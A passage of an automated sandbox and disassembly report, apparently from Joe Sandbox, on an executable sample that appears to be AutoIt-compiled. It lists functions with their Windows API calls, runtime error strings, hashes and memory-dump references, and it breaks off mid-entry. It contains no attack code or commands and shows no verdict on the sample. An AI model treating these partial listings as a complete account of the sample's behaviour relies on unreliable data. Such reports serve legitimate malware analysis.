                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                  • String ID: 0$2
                                                  • API String ID: 93392585-3793063076
                                                  • Opcode ID: fa530fbe83b9e3c982887783a4dc048d431b024c26ad8ff2ad9981fbc8892ca0
                                                  • Instruction ID: 45a97b92c2ca7f36dd296f5a033ddafe0add377dd6f9f2d533dedaed0ddae0f0
                                                  • Opcode Fuzzy Hash: fa530fbe83b9e3c982887783a4dc048d431b024c26ad8ff2ad9981fbc8892ca0
                                                  • Instruction Fuzzy Hash: 40519E70A0020DDBEB20DFA8D888BBEBFF5BF85324F144519E651E7290D7789941CB62
                                                  Function 005B2D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _ValidateLocalCookies.LIBCMT ref: 005B2D4B
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 005B2D53
                                                  • _ValidateLocalCookies.LIBCMT ref: 005B2DE1
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 005B2E0C
                                                  • _ValidateLocalCookies.LIBCMT ref: 005B2E61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: &H[$csm
                                                  • API String ID: 1170836740-2052090383
                                                  • Opcode ID: a9c8a2450337ed074daaba1bcbdc5db1cb70a7a82d0971fe5b2656094350f424
                                                  • Instruction ID: b278180c3e54b08345ef60cc4c7f337c5818d0df1203717c5fb1bf200e6cd395
                                                  • Opcode Fuzzy Hash: a9c8a2450337ed074daaba1bcbdc5db1cb70a7a82d0971fe5b2656094350f424
                                                  • Instruction Fuzzy Hash: 96417334A01209AFCF10DF68C859ADEBFB5BF45324F148555E814AB392D731BA06CBE1
                                                  Function 005FC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadIconW.USER32(00000000,00007F03), ref: 005FC913
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: IconLoad
                                                  • String ID: blank$info$question$stop$warning
                                                  • API String ID: 2457776203-404129466
                                                  • Opcode ID: ec0dd51d70e34d19fc107ff5ec01d1482b30a6c4a750aa1834eccdf9588b16d6
                                                  • Instruction ID: 795759a5f9fbe3442380d41b2b8e12c6f8890a69c126899f3894597727ae5768
                                                  • Opcode Fuzzy Hash: ec0dd51d70e34d19fc107ff5ec01d1482b30a6c4a750aa1834eccdf9588b16d6
                                                  • Instruction Fuzzy Hash: 9A115E3168930FBBE7105710DE82CFE6F9CFF15755B50003AF600A7182D7A9BE445664
                                                  Function 005FED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$LocalTime
                                                  • String ID:
                                                  • API String ID: 952045576-0
                                                  • Opcode ID: c8beabbe6f8f591b36d7b1c12d2981ff866c23d8184333b881d0140f0255c3a1
                                                  • Instruction ID: 55dfb20e3db80353f37c8f86aa778c5748fb4e96337261d8a3aec3a20a55dbc9
                                                  • Opcode Fuzzy Hash: c8beabbe6f8f591b36d7b1c12d2981ff866c23d8184333b881d0140f0255c3a1
                                                  • Instruction Fuzzy Hash: 41419269C1011966DB11EBB48C8F9DFBBACBF85310F508466E614E3122FB38E245C7A5
                                                  Function 005AF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,005E682C,00000004,00000000,00000000), ref: 005AF953
                                                  • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,005E682C,00000004,00000000,00000000), ref: 005EF3D1
                                                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,005E682C,00000004,00000000,00000000), ref: 005EF454
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow
                                                  • String ID:
                                                  • API String ID: 1268545403-0
                                                  • Opcode ID: fb878f2ed0ca24b4062b1d8e44784d0101545b6f29fab4f75de1a89c9af60631
                                                  • Instruction ID: ec0ff481a211aa0dd16f5f1422ebb02c98f7e5db905c1ff18e6aa07c773e4fd5
                                                  • Opcode Fuzzy Hash: fb878f2ed0ca24b4062b1d8e44784d0101545b6f29fab4f75de1a89c9af60631
                                                  • Instruction Fuzzy Hash: 53411931608680BECB798B69D89876F7F92BF97324F14583CE08757560DA72A881CB51
                                                  Function 00622D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 00622D1B
                                                  • GetDC.USER32(00000000), ref: 00622D23
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00622D2E
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00622D3A
                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00622D76
                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00622D87
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00625A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00622DC2
                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00622DE1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                  • String ID:
                                                  • API String ID: 3864802216-0
                                                  • Opcode ID: 2aa0d0b58b4db9d01b08b3fd3afc185e08dca40f0b6c45150476e5bdda5b916e
                                                  • Instruction ID: e96d5a7bf82b293d3cd0627072ac3a670356ffcd9b7d43793ee2a3f44ee0e353
                                                  • Opcode Fuzzy Hash: 2aa0d0b58b4db9d01b08b3fd3afc185e08dca40f0b6c45150476e5bdda5b916e
                                                  • Instruction Fuzzy Hash: 6B317F72201A24BFEB214F50DC8AFEB3BAAEF09725F044055FE089A291C6759C51CBA4
                                                  Function 005F5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: 7acad05dc88f3db8f012f74e912a16201fb04ae5e1ecd0d22957cfe9cd5de256
                                                  • Instruction ID: 607a028a1e7a07f2e1e7d6f1d22147286abc1df1d686f029fb4eed04d0c8f0bf
                                                  • Opcode Fuzzy Hash: 7acad05dc88f3db8f012f74e912a16201fb04ae5e1ecd0d22957cfe9cd5de256
                                                  • Instruction Fuzzy Hash: CD21F261745E1E7B925466209E92FFB2BADBF603C4F840430FF17DA681F728ED1085A9
                                                  Function 00614FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                  • API String ID: 0-572801152
                                                  • Opcode ID: 6bd89efbb9f9de9731ce9e4259892fddd4bda8f2f2e5be534c43770f7c76cbdc
                                                  • Instruction ID: 759728321e29151172ad21c04435f97e86568beb4b443ca44557996d461ea4e0
                                                  • Opcode Fuzzy Hash: 6bd89efbb9f9de9731ce9e4259892fddd4bda8f2f2e5be534c43770f7c76cbdc
                                                  • Instruction Fuzzy Hash: 6BD19671A0060ADFDF10DF98D881BEEB7B6BF88344F188469E916AB281D770DD85CB50
                                                  Function 005D1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCPInfo.KERNEL32(?,?), ref: 005D15CE
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005D1651
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005D16E4
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005D16FB
                                                    • Part of subcall function 005C3820: RtlAllocateHeap.NTDLL(00000000,?,00661444,?,005AFDF5,?,?,0059A976,00000010,00661440,005913FC,?,005913C6,?,00591129), ref: 005C3852
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005D1777
                                                  • __freea.LIBCMT ref: 005D17A2
                                                  • __freea.LIBCMT ref: 005D17AE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                  • String ID:
                                                  • API String ID: 2829977744-0
                                                  • Opcode ID: da3db7abe39aff89adddfb1c54050f6ebaee585149559b947b7178bc200b3514
                                                  • Instruction ID: db9828ec50cb8837055591062fa1bd7e225cd9da975492ba7af007580069e95a
                                                  • Opcode Fuzzy Hash: da3db7abe39aff89adddfb1c54050f6ebaee585149559b947b7178bc200b3514
                                                  • Instruction Fuzzy Hash: 0691C271E00A06AEDB308EA8D985AEE7FB5FF49310F18465BE806E7351D729DC40CB64
                                                  Function 00614523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit
                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                  • API String ID: 2610073882-625585964
                                                  • Opcode ID: 3ce37dadb81bc5ec1f76301c844c10c020e47e8bbd01482ceeeeb5111f78df94
                                                  • Instruction ID: 03e5b693d4a463aee7f949b04023e46f0e928c480fa52b36ec49b54a35979a8d
                                                  • Opcode Fuzzy Hash: 3ce37dadb81bc5ec1f76301c844c10c020e47e8bbd01482ceeeeb5111f78df94
                                                  • Instruction Fuzzy Hash: 83918171A00215ABDF20CFA4D844FEEBBBAEF46715F148559F505AB280DB709985CFA0
                                                  Function 00601187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0060125C
                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00601284
                                                  • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 006012A8
                                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 006012D8
                                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0060135F
                                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 006013C4
                                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00601430
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                  • String ID:
                                                  • API String ID: 2550207440-0
                                                  • Opcode ID: 1d24608326a720448a05675533a53e0ee95ec5dfe220b6e1caa4de6c8bc73101
                                                  • Instruction ID: 13c33f91b88ed509761d0cb4db251a1f25df4332e4bab9436c2205f84cf4890a
                                                  • Opcode Fuzzy Hash: 1d24608326a720448a05675533a53e0ee95ec5dfe220b6e1caa4de6c8bc73101
                                                  • Instruction Fuzzy Hash: 6891B071A402199FEB18DF94C885BBFB7B6FF46325F144029E501EB2E1D774A942CB90
                                                  Function 005A948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ObjectSelect$BeginCreatePath
                                                  • String ID:
                                                  • API String ID: 3225163088-0
                                                  • Opcode ID: 0c86b328571628898fb28ea2069f988bfe4d978d7e46bdfba4b59d8473e27e39
                                                  • Instruction ID: 4cfc080b1d906ff8a5654bd8a7c121bc88671104e5ce5ae88e74014925c7bef2
                                                  • Opcode Fuzzy Hash: 0c86b328571628898fb28ea2069f988bfe4d978d7e46bdfba4b59d8473e27e39
                                                  • Instruction Fuzzy Hash: 62912671D0021AEFCB14CFA9C889AEEBFB9FF89320F148455E515B7251D375A942CBA0
                                                  Function 00613947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 0061396B
                                                  • CharUpperBuffW.USER32(?,?), ref: 00613A7A
                                                  • _wcslen.LIBCMT ref: 00613A8A
                                                  • VariantClear.OLEAUT32(?), ref: 00613C1F
                                                    • Part of subcall function 00600CDF: VariantInit.OLEAUT32(00000000), ref: 00600D1F
                                                    • Part of subcall function 00600CDF: VariantCopy.OLEAUT32(?,?), ref: 00600D28
                                                    • Part of subcall function 00600CDF: VariantClear.OLEAUT32(?), ref: 00600D34
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                  • API String ID: 4137639002-1221869570
                                                  • Opcode ID: 7492788754723882b773aa9762a2b4da092ab47f7352164460315aa1446b82d3
                                                  • Instruction ID: df5782dbbac66e10f86b395803c266347b9af10d2ab661f9f497112bdc79c10d
                                                  • Opcode Fuzzy Hash: 7492788754723882b773aa9762a2b4da092ab47f7352164460315aa1446b82d3
                                                  • Instruction Fuzzy Hash: 58916D746083059FCB04DF24C4849AABBE5FF89314F18896DF88A9B351DB30EE45CB92
                                                  Function 00614BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005F000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?,?,005F035E), ref: 005F002B
                                                    • Part of subcall function 005F000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?), ref: 005F0046
                                                    • Part of subcall function 005F000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?), ref: 005F0054
                                                    • Part of subcall function 005F000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?), ref: 005F0064
                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00614C51
                                                  • _wcslen.LIBCMT ref: 00614D59
                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00614DCF
                                                  • CoTaskMemFree.OLE32(?), ref: 00614DDA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                  • String ID: NULL Pointer assignment
                                                  • API String ID: 614568839-2785691316
                                                  • Opcode ID: e3eee52abd4dc9c05fef77f0332f00601674eecd0d3b3a028b55274d51e5024a
                                                  • Instruction ID: 0fbcdeb6767481fea74d77d926beb155bf0198bacb58f3d1ab65731f20b878eb
                                                  • Opcode Fuzzy Hash: e3eee52abd4dc9c05fef77f0332f00601674eecd0d3b3a028b55274d51e5024a
                                                  • Instruction Fuzzy Hash: DA914971D0021EAFDF10DFA4D894EEEBBB9BF48310F148169E915A7241EB349A45CFA0
                                                  Function 006220FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetMenu.USER32(?), ref: 00622183
                                                  • GetMenuItemCount.USER32(00000000), ref: 006221B5
                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 006221DD
                                                  • _wcslen.LIBCMT ref: 00622213
                                                  • GetMenuItemID.USER32(?,?), ref: 0062224D
                                                  • GetSubMenu.USER32(?,?), ref: 0062225B
                                                    • Part of subcall function 005F3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 005F3A57
                                                    • Part of subcall function 005F3A3D: GetCurrentThreadId.KERNEL32 ref: 005F3A5E
                                                    • Part of subcall function 005F3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005F25B3), ref: 005F3A65
                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006222E3
                                                    • Part of subcall function 005FE97B: Sleep.KERNEL32 ref: 005FE9F3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
